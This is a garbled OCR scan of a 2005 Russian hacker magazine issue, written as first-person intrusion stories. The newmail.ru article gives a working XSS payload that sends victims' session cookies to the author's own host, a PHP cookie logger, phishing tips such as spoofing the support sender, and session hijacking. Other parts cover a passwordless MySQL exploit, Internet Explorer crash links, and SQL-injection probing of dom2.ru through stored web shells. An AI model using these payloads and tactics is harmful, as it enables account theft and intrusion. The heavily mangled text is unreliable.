включая привилегию ЗІТЕ ЕХЕС СІѴЮ. Затем 
происходит логин под этим пользователем и 
выполнение заданной команды. И надо ска- 
зать, этот баг присутствует даже в самой све- 
жей версии ЗегѵІІ, поэтому, если софтина ус- 
тановлена на компе, его хозяин обречен :). 
Да, совсем забыл. Чтобы узнать, установлен 
ли РТРЭ на машине, нужно выполнить вышео- 
писанную команду Л/ЕТ 8ТАРТ и найти в спис- 
ке службу Зегѵ-ІІ ЕТР Зегѵег. 

Если взломщик попал на домашний компь- 
ютер \л/еЬ-программиста, то он обязатель- 
но найдет на нем сервис туздісі. А в слу- 
чае если девелопер — человек старой за- 
калки, то версия демона будет начинаться 
на 3.x. Проверить это можно элементар- 
ной командой ТеІпеТ ір-осісігезз 3306. Релиз 
сервиса промелькнет в первой и един- 
ственной строке ответа. Если МуЗОЬ 
действительно принадлежит к третьей вет- 
ке, то можно попытаться его взломать :). 
В результате хакер не получит админский 
шелл, но зато сможет заценить содержи- 
мое всех таблиц. Для этого злоумышлен- 
ник скачивает эксплойт и использует его 
как обычный МуЗОЬ-клиент. При этом ха- 
кер вообще не указывает пароля на сое- 
динение. Если баг в сервисе имеется, то 
поддельный клиент без труда законнектит- 
ся и выдаст содержимое секретных деве- 
лоперских таблиц. Которые, кстати, можно 
продать за неплохие деньги :). 

[если ничего не помогает] Если, несмотря 
на многочисленные попытки взлома, адми- 
нские права так и не перепали, взломщик 
даже не огорчится. В этом случае у него 
есть два выхода. Либо заЭоЗить упрямую 
систему, либо использовать ее в корыст- 
ных целях, но с пользовательскими приви- 
легиями. Рассмотрим эти варианты более 
подробно. 

Чтобы организовать ЭоЗ, необходимо вос- 
пользоваться более ранними уязвимостями. 
Несмотря на устарелость, баг затаился во 
многих системах, а именно в Іпіегпеі Ехріогег. 
Я думаю, немногие пользователи регулярно 
сливают патчи к ослику, поэтому прием с 
убийством ѴѴіпсІоѵ/5 наверняка будет успе- 
шен. Итак, чтобы убить вражескую систему. 



хакер аккуратно сливает страницу 
и/ѵи /ѵЛтап.сот/ехрІоіТз/ТіпуЬтр.ІіТіп, а за- 
тем все вложенные картинки, упомянутые в 
НТМІ_-коде. Если у хакера старый непропат- 
ченный осел, ему вовсе не стоит соваться на 
ссылку, иначе его Винда скоропостижно 
отбросит копыта :). Лучше слить страницу ка- 
ким-нибудь менеджером закачек, не забыв 
про рекурсию. После этого все локальные 
файлы транспортируются на удаленную ма- 
шину, а затем уже известным тебе способом 
запускается ехріогег. Через каких-то 10-15 
секунд вся оперативная память тут же будет 
съедена, и машина уйдет в даун. 
Существует еще один баг, который не бу- 
дет долго мучить Винду. Он сразу же ее ре- 
бутнет. При определенных обстоятельствах 
хакеру может понадобиться перезагрузить 
систему, однако без дополнительных 
средств этого не сделать (команда зііиі- 
сіоѵѵп -г недоступна даже пользователю 
ЗУЗТЕМ). Рестартануть форточки взломщику 
поможет брешь в обработке АІ\ІІ-файлов. 
Если ты внимательно читал статью, то на- 
верняка помнишь, что я уже описывал этот 
глупый баг. Однако помимо эксплойта су- 
ществует ЭоЗ'ер, задача которого — увес- 
ти систему в геЬооі. Я не буду рассказы- 
вать, как скомпрометировать перезагруз- 
ку, а просто дам ссылку на опасный НТМЬ- 
файл: 

ѵѵтл/.хіосиз. пеТДІазІізку/ісоЕхр/апіЫие.ІіТт . 

[а зачем тебе права?] Взламывая виндовый 
сервер, злоумышленник преследует ка- 
кие-то цели. Один желает спионерить до- 
кументы, которые не прочитаешь под неп- 
ривилегированным аккаунтом. Второй хо- 
чет заиметь права, чтобы открыть систем- 
ный порт. А третий хакает винду, не зная, 
зачем он это делает. Так вот, чтобы не тра- 
тить время зря, определись с вопросом, 
нужны ли тебе повышенные права. К при- 
меру, для запуска того же брутфорса или 
вражеского бота не требуется дополни- 
тельных полномочий. Некоторым програм- 
мам необходимы дополнительные приви- 
легии, однако в инете полно альтернатив- 
ного софта, запускающегося под обычным 
аккаунтом. Пример тому — Ьоипсег. Кста- 
ти, методы работы с этой программой я 
описывал в февральском видеоуроке ѳ 




[целимся в сердце ЗегѵІІ!] 
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Свежие баги 
новой почты 

ЕСТЬ ЛЮДИ, КОТОРЫЕ СОВЕРШЕННО ЗАБИ- 
ВАЮТ НА БЕЗОПАСНОСТЬ СВОЕГО ПРОЕКТА. 
ДЕЛО НЕ В ТОМ, ЧТО ОНИ САМИ НЕ РАЗБИ- 
РАЮТСЯ В ЭТОМ И НЕ МОГУТ ПОЗВОЛИТЬ 
СЕБЕ НАНЯТЬ ПРОФЕССИОНАЛА. ДЕЛО В 
САМОМ НЕЖЕЛАНИИ УСИЛИВАТЬ ЗЕСІІРІТѴ 
И В НЕПОНИМАНИИ ВАЖНОСТИ ЭТОЙ СО- 
СТАВЛЯЮЩЕЙ. ЧТО ИЗ ЭТОГО ПОЛУЧАЕТ- 
СЯ, ВСЕ МЫ ЗНАЕМ — ДЛИННАЯ ЛЕНТА ЗА- 
ДЕФЕЙСЕННЫХ САЙТОВ НА БАГТРАКЕ. КРУ- 
ПНЫЕ СЕРВИСЫ ЗАЩИЩЕНЫ НАМНОГО ЛУЧ- 
ШЕ. СЛУЧАИ ПОЛОМОК ТАКИХ СИСТЕМ 
КРАЙНЕ РЕДКИ. НО ВПРОЧЕМ, ЭТО НЕ ВСЕГ- 
ДА ТАК. СЕГОДНЯ Я РАССКАЖУ ТЕБЕ О ТОМ, 
КАК МЕНЕЕ ЧЕМ ЗА ПОЛЧАСА ОДИН ХАКЕР 
РАСПРАВИЛСЯ С ПЯТЬЮ САЙТАМИ 

В ДОМЕНЕ МЕѴѴМАИ I ІЗоззогтіаГіааг (гоззотаІіааг@таіІ.ги) 

Уязвимости почтового сер- 
вера пеѵѵтаіі.ги 

[как все начиналось] Вся история, как и многие подобные 
ей, началась поздним вечером. Автор, прогуливаясь по 
Сети, решил зайти в ЖЖ одного знакомого. Оставив свой 
коммент, я уже собирался уходить, как вдруг увидел ссы- 
лку рядом с изег іпію. Эта ссылка вела на его сайт, о суще- 
ствовании которого я и не подозревал. На сайте пробыл 
не долго, читать там было практически нечего — типичная 
хомпага. Мое внимание привлекла ссылка на архив фо- 
тографий. Поскольку весили они не так много, я, недолго 
думая, кликнул по ней и начал ждать загрузки страницы. 
Но не тут-то было. Сайт находился на сервере «Новой 
почты», у которой насчет файлов своя политика, как, впро- 
чем, и у многих других подобных сервисов. Перед отправ- 
кой файла их сервер проверял наличие соокіез, которые 
у меня были заблокированы. Делалось это для того, что- 
бы помешать другим веб-мастерам ставить ссылки на чу- 
жие файлы, находящиеся на серверах /Ѵеи /МоіІ.ги. 

[волшебная страничка] В результате меня перебро- 
сило на страничку, содержащую ссылку на скачи- 
ваемый архив. Я уже хотел было забрать его, но мой 







взгляд по привычке устремился в адре- 
сную строку браузера. Она выглядела 
так: Іііір ://мѵил п е ѵѵт оіі. ги/т еззадез/Я- 
Іе.сІІі1'тІ?1 : іІе=зоте.пеѵѵтоіІ.ги/агсІііѵ 
/зѵѵіТс/іДгепсІ.Ірд. Такой поворот собы- 
тий враз заставил меня забыть о чу- 
жих фотках :). Я очень люблю, когда 
параметры задаются в виде ссылки, 

— обычно такие системы содержат 
много багов. Так оказалось и в этот раз. 

Я сразу же начал подставлять туда зна- 
чения типа ../../../../еіс/роззѵѵсі. Но это, 
естественно, не заработало. В принци- 
пе, я даже не рассчитывал, что это что-то 
даст, но попробовать из интереса стои- 
ло. Я заметил, что значение переменной Т/'/е 
подставляется в адрес ссылки на файл. То 
есть если запросить файл зоте.пеѵѵто- 
І1.ги/агс1ііѵ/зѵѵііс1і/1 : гепс1.]рд, на странице 
это будет выглядеть как ІіТТрУ/зоте.пеѵѵта- 
И.ги/агсІііѵ/зѵѵіТсІі /?гепсІ._ірд. Тогда я решил 





ирмгг &АІМ -еютіпі 

ПР1«ЕТ МЧНЬ4 ги™т 



[бажный скрипт] 



Товарищ, помни! Всю ин- 
формацию мы предоставля- 
ем только 
/ I \ в ознакомительных целях. 
Ни автор, ни редакция не 



посмотреть, проверяет ли 
скрипт переменную на нали- 
чие спецсимволов, а именно 
ПІтпІ-тэгов. Вместо строки с 
адресом архива я подставил 




несут ответственности за <Ті1>ПРИВЕГ, БАЖНЫЙ СІ<РИГГГ</М>. 
твои вероятные подвиги ;). Если ты посмотришь на скрин- 

Не нарушай закон шот, то увидишь, что из 

этого получилось. 

Переменная Тііе не фильтровалась. То есть в страницу можно 
внедрить любой НТМІ_-код. Но что это даст? Если кто-то из чи- 
тателей является «счастливым» владельцем почтового ящика 
или сайта на «Новой почте», то пусть вспомнит, как проходит 
авторизация. Первый раз тебя просят ввести логин и пароль, 
которые записываются в соокіе в виде идентификатора сес- 
сии. После данной операции почтовики узнают тебя и без ав- 
торизации. Причем хочешь ты того или нет, запретить запись 
сессии в куки невозможно — это делается насильно. Те, кто 
давно читает наш журнал, наверняка уже догадались, как 
можно выжать выгоду из этой ситуации. Тем более что о взло- 
ме «Новой почты» мы уже писали. 



<? 

\і ($ОУЕЕ{У_ЗТЕ11МО=="") ехй; 

$Ыореп ("сІаіа.сІаЕ , ,"а+"); 

ТѵѵгіІе($Т, "$ОІІЕЕ1Ѵ_ЗТЕ!ІМѲ \п\п"); 

ІсІозе(${); 
есііо "Все ок"; 

?> 

Даже если ты не знаком с РНР, тебе все должно быть понятно, кро- 
ме, разве что, переменной $ОиЕТ?Ѵ_8ШЫѲ, которую мы записыва- 
ем в файл. $ОЕ/Е/?К_577?/Л/0 — это переменная окружения, содер- 
жащая в себе все параметры, передаваемые скрипту. Проще го- 
воря, если обратиться к нему ссылкой домен/?Т=15&дІі=22, то в 
файл будет записано значение, идущее после вопросительного 
знака: І=15&дІі=22. Можно еще добавить функцию таіІ();, которая 
отсылала бы нам результаты прямо на мыло. Делается это доста- 
точно легко: тоіі (" зігеот@озкоІпеі.ги"/іотер кІипиІ","$ОиЕ- 
ПУ_8т1Ы<3");. 

Следующий шаг — написание яваскрипт-кода, который должен 
отсылать нам результат своей работы. Я решил сразу встроить 
его в ссылку, чтобы тебе лучше запомнилось: 

Ііир://ѵѵѵѵѵѵ.пеѵѵтаіІ.ги/те55аде5ЛіІе.сІ[іітІ?ЛІе=ѵѵоѵѵ”>ІоІ</а><зсгірі 
Іапдиаде= ,, іаѵазсгірі ,І >ореп( І Иир://хЬіЕ5ѵѵіІсІі.рр.ги/іпсІех.рІір? І +сІоси- 
тепЕсоокіе); </зсгір{><а> 

По идее, после прохождения по этой ссылке должна открыться 
страница (ее код приведен выше), записывающая переданные па- 
раметры, но этого не произошло. Я попытался повторить действия, 
но ничего не вышло. Поначалу промелькнула мысль о синтаксиче- 
ской ошибке — содержимое ява-контейнеров было выведено как 
обычный текст. Просмотрев сорцы собранной страницы, я заметил 
любопытную фишку: знак «+» в переменной Ше фильтровался! Он 
заменялся пробелом, поэтому із-код работал совсем не так, как 
мне хотелось. К слову, этот факт сильно удивил — фильтруя знак 
сложения, разработчики поленились добавить функцию очистки 
НітІ-тэгов. Это было по меньшей мере странно, и поначалу я даже 
думал, что ничего не получится. Ведь присоединить к ссылке куки- 
сы становилось невозможным. Но тут мне пришла в голову одна 
идея, которая и помогла выйти из этой ситуации. Ведь іаѵазсгірНкод 
можно использовать двумя способами: непосредственно вставить 
в страницу или прилинковать атрибутом зге. Так как первый вариант 
не подошел, пришлось воспользоваться вторым. Залив файлхЬ/Е/з 
на свой сервер, я составил следующий линк: 



[СЗЗ рулит] Нет-нет, таблицы стилей здесь не причем. СЗЗ-ата- 
кой называют действия, в ходе которых при помощи методов 
серверного приложения проводится атака на клиентскую сто- 
рону. Если в детстве ты учил \л/еЬ-языки, то наверняка помнишь, 
что печенья читаются только теми узлами, которые их поставили. 
Другим доступ закрыт. Весь смысл атаки сводится к тому, чтобы 
внедрить вредоносный код в страницу на ломаемом сервисе. 
Как можно запустить жука на сервер «Новой почты», мы уже зна- 
ем — подставить его в параметр переменной Т\\е. Сам же жук 
будет представлять собой простейший іаѵазегірі-код, читаю- 
щий куки и отправляющий их специальному скрипту. Чтобы удо- 
стовериться в своих подозрениях и не обломаться в решающий 
момент, я подставил следующий код: <зсгірі Іапдиаде=']а- 
ѵа5СгірГ>аІегТ(сІоситепТ.соокіе);</5СгірТ>. В результате перехо- 
да по сконструированной ссылке функция аІегТО ; выдала мини- 
окошко, в котором содержались все данные, необходимые для 
авторизации на сервере «Новой почты». Это меня очень пора- 
довало, и я принялся подготавливать инструменты для осущест- 
вления атаки. Ее сценарий будет выглядеть так: 

Ш Жертве каким-либо образом нужно подсунуть ссылку (как это 
сделать лучше всего, поговорим позже). 

\2\ После перехода по ней кукисы ламера считываются внедрен- 
ным І5 (его встроим с помощью параметра переменной Ше). 

[з] Яваскрипт открывает принимающую кукисы страницу с па- 
раметрами в виде прочтенных пользовательских соокіе, про- 
исходит запись результатов в файл, о чем мы узнаем по при- 
шедшему письму. 

0 Подделываем печенья и логинимся на сервере. Начнем со 
скрипта приема кукисов, который отсылал бы их нам на мыло 
или записывал в файл на сервере. Ниже представлена его 
РНР-реализация: 



Ііир://ѵѵѵѵѵѵ.пеѵѵтаіІ.ги/теззаде5ЛіІе.сІ[іітІ?ЛІе=ѵѵоѵѵ”>ІоІ</а><5СгірІ 

згс=”ІіНр://хЬіЕ5ѵѵіісІі.рр.ги/хЬіЕ]5”></зсгірі><а> 

В самом же хЬ/'Е/з я оставил всего одну строчку: 

орепСІіир^/хЬіЕзѵѵіісІі.рр.ги/іпсІех.рІірЗ'+сІоситепЕсоокіе); 

Полдела было уже сделано. Осталось подсунуть линк жертве. 




[вот так в НТМЬкод добавлен наш скрипт. Немного кривовато, но мы это ис- 
правим] 



[хакер 04 [76] 05 065 ] 




[хакер 04 [76] 05 066 ] 




[как видишь, теперь код вставился нормально] 

[маскировка] Для проведения любой атаки необходимо остать- 
ся незамеченным. Речь идет не только о том, чтобы жертва не 
смогла впоследствии найти обидчика. Под вопросом стоит успех 
самой атаки. Ведь если юзер не пройдет по ссылке, то мы не по- 
лучим его данные. Для того чтобы не попалиться, опытные взлом- 
щики имеют в виду следующее. 

Ш Место размещения линка очень важно. В данном случае луч- 
ше всего прислать его по почте. Почему — я думаю, понятно. Во- 
первых, потому, что для чтения почты пользователю придется за- 
логиниться на почтовом сервере, а это гарантирует наличие ку- 
ков — пеѵѵтоіі.ги установит свежие печенья, которые и украдет 
хакер. А во-вторых, хакер может подделать заголовок письма и в 
отправителе указать службу поддержки ломаемого сервиса. Это 
даст практически 100% гарантию прочтения письма. 

Ш Когда юзер пройдет по ссылке, у него откроются два окна. 
Первое — бажная страница, вторая — страница, записывающая 
кукисы. Это вызовет много вопросов, тем более что на уязвимой 
странице в качестве ссылки на файл будут торчать МппІ-тэги. Вы- 
вод — от такой страницы нужно избавиться. Сделать это на все 
том же яваскрипте не составит труда, ибо для этого существует 
специальная функция сІозеО, которая и закроет подозрительную 
страничку. В браузере Опера все пройдет безо всяких проблем. 
С ІЕ будет чуть сложней, так как ослик спрашивает разрешения 
на закрытие страницы, что не есть гуд. Но и с этим можно легко 
справиться. Если верно составить яваскрипт, то функцией сіоси- 
тепі. уѵгііеО на странице можно вывести любой текст, который и 
успокоит пользователя. 

[з] Ссылка. Даже полный ламер не клюнет на наживку, если 
крючок из нее будет торчать слишком нагло. Это я к тому, что 
неплохо было бы зашифровать сам линк. Делается это очень 
просто — при помощи Пех-перекодировщиков, коих в Сети про- 
сто немерено. 

[результат] После проделанных операций хакер получает все 
содержимое куков пользователя: 

Ь=Ь; сизЫіаз{зП_М{16гВОрѴАуОѵ276ЕОсрМКтдЩ рф=пт-1; 

рорсН=пт-рорсІМ ; рфз=пт-3; зеззіоп=20МТзМпХѴ04идЗиі- 

ОС6І\ІсаеАПІ_Р5ѴѴЮт; Ь=Ь 

Немного странная запись. Ты, наверное, ждал, что мы получим 
что-то типа связки логин-пароль? К сожалению, І\Іѳ\л/МаіІ прово- 
дит авторизацию при помощи идентификатора сессии, что поз- 
же очень нам помешает :(. Итак, получив чужие куки, я присту- 
пил к заключительному шагу — авторизации под видом жертвы. 
Заюзав специальный софт для редактирования кукисов, я изме- 
нил свои данные на полученные (ранее я зарегистрировался 
на «Новой почте», где мне и поставили мои печенья). Набрав в 
браузере адрес сервера, я с нетерпением ждал загрузки и ус- 
пешной авторизации, но неожиданно возникла проблема, ко- 
торую я должен был предвидеть. Дело в том, что скрипт мог чи- 
тать только куки, которые были установлены сервером 
и/и/и/4. пеѵѵтоіі.ги, а процесс опознания проходил в домене 
ѵѵѵѵѵѵ.пеѵѵппаіі.ги. Позже, разобравшись во всех куках, я понял, 
что они устанавливаются дважды: первый раз при вводе логина 
и пароля, а второй — при попадании в домен и/ѵѵи/4. пеѵѵтоіі.ги. 
Куки, устанавливаемые последним доменом, выудить удалось. 
Но для доступа к пользовательскому аккаунту требовались и 



печенья, полученные при авторизации. Их у меня не было. Такой 
расклад событий меня не устраивал, и, загрузив индексную 
страницу почтовика, я принялся выискивать аналогичный баг. 
Поиски были тщетны — бажных страниц больше не было. Да да- 
же если бы и были, заманить ламера сразу на две страницы 
вряд ли удастся (конечно, можно организовать все дело при 
помощи рор-ир окон, но это выглядело бы слишком подозри- 
тельно). Огорченный, я сделал еще две попытки зайти на сер- 
вак, но, увы, они были неудачными. 

Знаешь, бывают такие моменты, когда, перепробовав практически 
все свои коронные фишки, хакеру приходится отступать. Так было и 
со мной. Напоследок я еще пару раз поколдовал с печеньями, но и 
это оказалось пустой затеей. И вдруг я вспомнил один интересный 
случай из своей практики — из-за кривой системы опознания поль- 
зователя бажный форум пропускал любого обратившегося сразу к 
топику, а не на индексную страницу. После этого у меня появилась 
слабая надежда, что одна из страниц почтовика могла не прове- 
рять печенья, установленные индексным хостом (и лллл/. пеѵѵтоіі.ги — 
этих куков у меня не было). Успешно залогинившись под тестовым 
ником, я записал адреса ключевых страниц управления аккуантом. 
Завершив сеанс, сразу же приступил к реализации задумки — под- 
менив печенья на украденные и изменив идентификатор сессии в 
параметре зеззіоп.ісі, стал поочередно просматривать страницы. 
Начал с почтового интерфейса и... увы, обломился. Но поиск про- 
должил. И удача улыбнулась мне — страница загрузки файлов на 
сервер не требовала отсутствующих кукисов! Это значит, что, зав- 
ладев одним только идентификатором сессии, я мог админить сайт 
жертвы. А позже выяснилось, что для этих целей даже не надо под- 
делывать соокіе, так как страница работает исключительно с сес- 
сией, передаваемой параметром зеззіоп_ісІ. 




[регистрируйся и взламывай!] 

[заключение] Вот я и поведал тебе о новом баге знаменитого почто- 
вика. Увы, так получилось, что из-за измененной системы авториза- 
ции мы так и не смогли получить полный доступ к аккаунту пользова- 
теля. Хотя это с какой стороны посмотреть. Дело в том, что сервис 
пускает на страницу со сменой пароля и секретного вопроса. Из- 
менить ответ на секретный вопрос не составит труда, а вот поставить 
новый пароль не получится, поскольку для этого требуется знать ста- 
рый пасс. Никто, правда, не мешает хакеру изменить секретный во- 
прос, а затем восстановить пароль, используя его! @ 



[Тірзй.Тгіскг] 

Хочешь увидеть свои советы в журнале? Присылай их на адрес 5кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 

До сих пор многие пользуются дискетами формата 3,5". Бывает та- 
кая ситуация, что дискета перестает читаться и система ѴѴіпсІоѵѵз 
предлагает отформатировать ее. Так вот, не все потеряно! Меня 
много раз спасали от потери данных такие действия: вставляем чис- 
тую (то есть читаемую дискету), открываем, после чего меняем ее на 
битую дискету. Не закрывая окна, жмем «Обновить» или Р5 и смот- 
рим содержимое битой дискеты [ОМА]МеІѵѵогМ ирго@таіІ.ги 









Более миллиона 
ІТ-сотрудников регулярно 



пользуются 
инструкциями 
по безопасности 
МісгобоЛ®. 



А вы? 



Более миллиона ваших коллег используют Центр инструкций по безопасности - ресурс, предоставляющий 
последние разработки в области безопасности. Регулярно посещая его, они получают инструменты, инструкции 
и тренинги, необходимые для повышения уровня защиты их компании от хакерских атак, вирусов и других угроз 
ІТ-инфраструктуре. Посетите Центр инструкций по безопасности тісгоБО^.сот/гиБ/БесигіІу/диісІапсе, 
чтобы ознакомиться с последними обновлениями. 



Загрузите пакет обновления МісгобоЛ® ѴѴіпсіоѵѵб® ХР Бегѵісе Раск 2 и оцените последние улучшения, 
позволяющие значительно повысить контроль над операционной системой и обеспечивающие 
ее надежную защиту. 



Бесплатный ѴѴеЬ- инструмент Опііпе 5еІ{ АББеББтеп* поможет вам самостоятельно оценить уровень 
информационной безопасности вашей организации и определить области, нуждающиеся 
в усовершенствовании. 



Бесплатные оповещения службы поддержки по электронной почте. Быть в курсе всего, что связано 
с вопросами информационной безопасности, - просто: подпишитесь на бесплатные оповещения службы 
уведомлений безопасности корпорации МісгобоИ 



Бесплатные инструменты безопасности. Получите средства против любых потенциальных угроз 
системе безопасности вашей сети. Воспользуйтесь преимуществом бесплатных инструментов и технологий, 
таких, как МісгозоЙ Вазеііпе Бесигііу Апаіугег и БоІФ/ѵаге Іірсіаіе Бегѵісез. 



Посетите тісгозоЛ.сот/гих/БесиггІу/диісІапсе 

Периодически посещайте Центр инструкций по безопасности для ознакомления с новыми разработками в области защиты 
ІТ-инфраструктуры. Постоянные обновления гарантируют, что, посетив всего один ресурс, вы найдете все инструменты 
и тренинги, необходимые для повышения уровня безопасности вашей компании. Для получения конкретных решений 
и подробной информации посетите тісго 50 ^.сот/ги 5 / 5 есигііу/диісІапсе прямо сейчас! 



МісгозоП 



© 2004 МісгобоД СогрогаЛоп. Все права защищены. Владельцем товарных знаков МісгобоЛ, ѴѴіпсіоѵѵб, зарегистрированных на территории 
США и/или других стран, и владельцем авторских прав на их дизайн является корпорация МісгобоЛ. Все имена продуктов, 
упомянутых в тексте, могут являться товарными знаками, зарегистрированными соответствующими владельцами. 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕПНЫМ НЬЮСЫ 





Тотальный 



дестрой «Дома-2» 

КАК ПРАВИЛО, ДВИЖКИ КРУПНЫХ ИНТЕР- 
НЕТ-ПРОЕКТОВ ПИШУТСЯ ПОД ЗАКАЗ. ПРЕ- 
ИМУЩЕСТВО ТАКИХ РЕШЕНИЙ СОСТОИТ В 
ТОМ, ЧТО ИСХОДНЫЙ КОД НЕДОСТУПЕН 
ДЛЯ ВЗЛОМЩИКОВ И, СЛЕДОВАТЕЛЬНО, 
СТАНОВИТСЯ ГОРАЗДО СЛОЖНЕЕ НАЙТИ 
В НЕМ УЯЗВИМОСТЬ. НО ЧАСТО БЫВАЕТ 
ТАК, ЧТО, ЖЕЛАЯ СЭКОНОМИТЬ, К ПРЕКРАС- 
НОМУ ДВИЖКУ ДОБАВЛЯЮТ КАКОЙ-НИБУДЬ 
ПОПУЛЯРНЫЙ ОРЕЫЗОІІВСЕ ФОРУМ ИЛИ 
ЧАТ, ТЕМ САМЫМ КОМПРОМЕТИРУЯ БЕЗО- 
ПАСНОСТЬ ВСЕЙ СИСТЕМЫ. ИМЕННО ТАК 
И ПОЛУЧИЛОСЬ В ЭТОМ СЛУЧАЕ, КОГДА Я 
ВЗЛОМАЛ САЙТ МЕГАПОПУЛЯРНОГО РЕАЛИ- 
ТИ-ШОУ «ДОМ 2» I Ѳгеепѵ/ооЭ (дгееп\люосІЗ@уапЦех.ги) 



т 



ІІЯІ — ІІпгіогт Яезоигсе 
Шепіійегз — это строка 
символов, указывающая на 
абстрагированные ресурсы 
системы. Разделяется на 
ІІЯІ ІІпіІогт Яезоигсе 
іосаіог и ІІЯМ ІІпіГогт 

ведущих подходит к ноутбуку, Яезоигсе Ыате. Подробную 

открывает крышку и, смотря на информацию смотри в ЯЯС 

светящуюся матрицу, говорит: 2396 и 2732. 

«Вася, сегодня зрители на тво- 
ей стороне!». Вася на первом месте по ЗМЗ-голосованию, он ос- 
тается в шоу. А я тем временем замечаю, что результаты голосо- 
вания открыты в Іпіегпеі Ехріогег, а в адресной строке браузера 
написано Шр://сІот2.ги/5іп5/іттипіТу. Значит, результаты голо- 
сования лежат в интернете, а это уже интересно. Запоминаю ад- 



рес сайта и срочно отправляюсь развеяться на улицу. 



История взлома сервера 
крупной телекомпании 

[іпіто] В один ничем не примечательный вечер, лежа 
на диване, я смотрел кабельное телевидение. Прог- 
рамм там было предостаточно, но найти что-то под 
настроение никак не удавалось. Переключая каналы, 
я наткнулся на рекламу проекта «Дом 2». Реклама за- 
кончилась, в углу экрана появился логотип ТНТ, и мне 
стало интересно, что же это за проект. 

После нескольких минут просмотра все стало понят- 
но. Люди «строят любовь» по телевизору, при этом 
немного переигрывают, жуют по заказу отвратную 
лапшу и запивают ее рекламируемым бульоном. Все 
эти маски на лицах, фальшивые улыбки, бесполезные 
разговоры. Однако это прет кучу народу, и кто-то на 
этом неплохо зарабатывает. 

Конечно, продолжать смотреть это у меня не возникло 
никакого желания, и я решил, что лучше сходить поды- 
шать свежим воздухом, чем смотреть эту гнусную син- 
тетику. Уже собравшись уходить, я заметил, что там 
начинается какое-то голосование. Ведущий сказал, 
что сегодня мужское голосование, так что, парни, 
крепитесь. Затем произошел сам воатинг, результа- 
том которого стала фраза «Извини, Вася, но ты сегод- 
ня уходишь». В Васиных глазах видна скорбь. Одна из 



[ночной экскурс] После прогулки нужно выспаться перед ночным 
боем. Действительно, несколько часов хорошего сна никому 
еще не повредили. Ставлю будильник и — спать. 

Просыпаюсь от противного звона, сонный смотрю на часы. Отлич- 
но! Ровно два часа ночи, пора приниматься за дело. Звоню про- 
вайдеру, у него, как обычно в это время, занято. После двадца- 






ШрУ/ѵ\/ш.8есигііу- 
1аЬ.ги/49633.Ыт1 
йіір://ііс.пеШс2732.ІіітІ 
йІІр.7/ііс.пеШс2396МтІ 
Шр://гзі. ѵоіб.ги/бо тіо- 
аб/г57рбрЬЬ2010Хх\ - 



р!ірВВ2.10.0 Ехрііі 
ШрУ/йеапеЫІ.зоигсеІог- 
де.пеі/зоигсеіогде/рііртуаб- 
тіп/рбрМуАбтіп-2.6.1 Хаг.ді 
- рбрМуАбтіп 
Шр'Мііті .весигі- 
Іу.ппоѵ.ги/зоЮргоху/О.бЬ/Зр 
гоху.іді - ЗРгоху 
ШрУ/бо шпіоаб.іпзеси- 
ге.огд/птар/сЧзі/птар- 
3.81 Хдх - І\Ітар 



ти попыток я наконец-то в Сети. 
Ну что ж, приступим. Для нача- 
ла мне нужно было позаботить- 
ся о собственной безопаснос- 
ти. Для этого необходимо было 
найти качественный аноним- 
ный проксик. Как известно, ни 
один риЫіс-ргоху нельзя счи- 
тать надежным, и поэтому я ре- 
шил заюзать свой собственный. 
Открыв заранее припасенный 
файл ѵѵеЬзІіеІІз.ТхТ, я нашел подходящую машину и установил туда 
ЗРгоху от ЗАРАЗЫ, добавив в исходник строку ФсіеХіпе АЛ/ОЛ/Ѵ'- 
МОІІ8, чтобы соблюдать анонимность. 



[первый осмотр пациента] Указав в браузере, что нужно подклю- 
чаться через прокси-сервер, я зашел по адресу Іііір://сІот2.ги/ 
зтз/іттипііу, и передо мной предстала страница с тем самым 
рейтингом голосований, который я видел вечером. Результаты вы- 
водятся пользователю во флэше и, наверное, динамически меня- 
ются каким-то управляющим скриптом. Но меня это пока не осо- 
бенно интересовало. На странице с рейтингом ничего интерес- 
ного не было, и тогда я зашел на главную страницу ресурса. Как 
выяснилось позже, на сайте находится довольно много различ- 
ных скриптов, и в большинстве из них существуют ЗОЫпіесТіоп 
ошибки. Например, обратившись по адресу Шр://1 : огипп.сІот2.ги/ 
іпсІех.рІ7І7пІ?Іогипп =', я увидел ошибку следующего вида: 

Оиегу Еггог! 

Уои Иаѵе ап еггог іп уоиг 50І_ зупіах. СИеск іИе тапиаі іііаі соггезропсіз іо 
уоиг МуЗОІ_ зегѵег ѵегзіоп іог іИе гідИі зупіах іо изе пеаг ’Ѵ АЫО 
тзд_Ю=тзд_ТІігеасІЮ АЫО тзд_3іаіиз=1 1 аі Ііпе 1 

В данном случае возможна ЗОІ_-инъекция, но символ одиночной ка- 
вычки экранируется, а это очень сильно снижает возможности ата- 
ки. Тогда я попытался заменить одинарную кавычку на ее ІІРІ-ана- 



/ценная ишьн ьшь іиюд ЛОГ % 27 . ОДНОКО ЭТО Не ПОМОГ- 

[М] моего дикого воображения. ло, и сервер вновь поставил эк- 
Читатель должен ран. Я решил оставить на время 

форум и получше оглядеться на 
сайте. Сразу нашелся мага- 
зин. Запрос Шр://сІот2.ги/5Ііор/ 
іпсІех.рІі1'тІ?ссіТ=' показал, что 
и этот скрипт тоже бажный. В ис- 
ходнике страницы я нашел N6- 
беп-параметр с номером воп- 
роса для голосования, однако 
эта переменная проверялась. 

• на нашем диске ты Несмотря на неудачу, все-таки 

найдешь многие из некоторые зацепки у меня бы- 

вышеописанных программ ли. Но я решил оставить их на 

самый крайний случай, пос- 
кольку пока что мне не хоте- 
лось возиться с составлением ІІІМІОМ-запросов. 

Я решил собрать как можно больше информации об интересую- 
щем хосте, чтобы потом прикинуть дальнейший план действий. 



Данная статья есть плод 
моего дикого воображения. 
Читатель должен 
воспринимать этот 
материал как информацию 
к размышлению. 
Размышлять об этом 
рекомендуется в мысленной 
форме и никогда не 
предпринимать чего-либо 
незаконного. 

На нашем диске ты 
найдешь многие из 
вышеописанных программ 
и скриптов. 



[детальный сбор информации] Для начала я узнал ір-адрес сай- 
та сІот2.ги, для чего выполнил на ѵ\/еЬ-шелле команду пзіоокир 
сіот2.ги, которая указала на 83.222.5.45. 

Введя в браузере адрес Шр:/ /83.222.5.45, я увидел только стан- 
дартную страничку Арасіте с сообщением об успешной установ- 
ке. Стало ясно, что тут хостится не один сайт и сервер настроен 
на использование виртуальных хостов. 

Тогда я сделал обратный резолв ІР и узнал, что данному адресу 
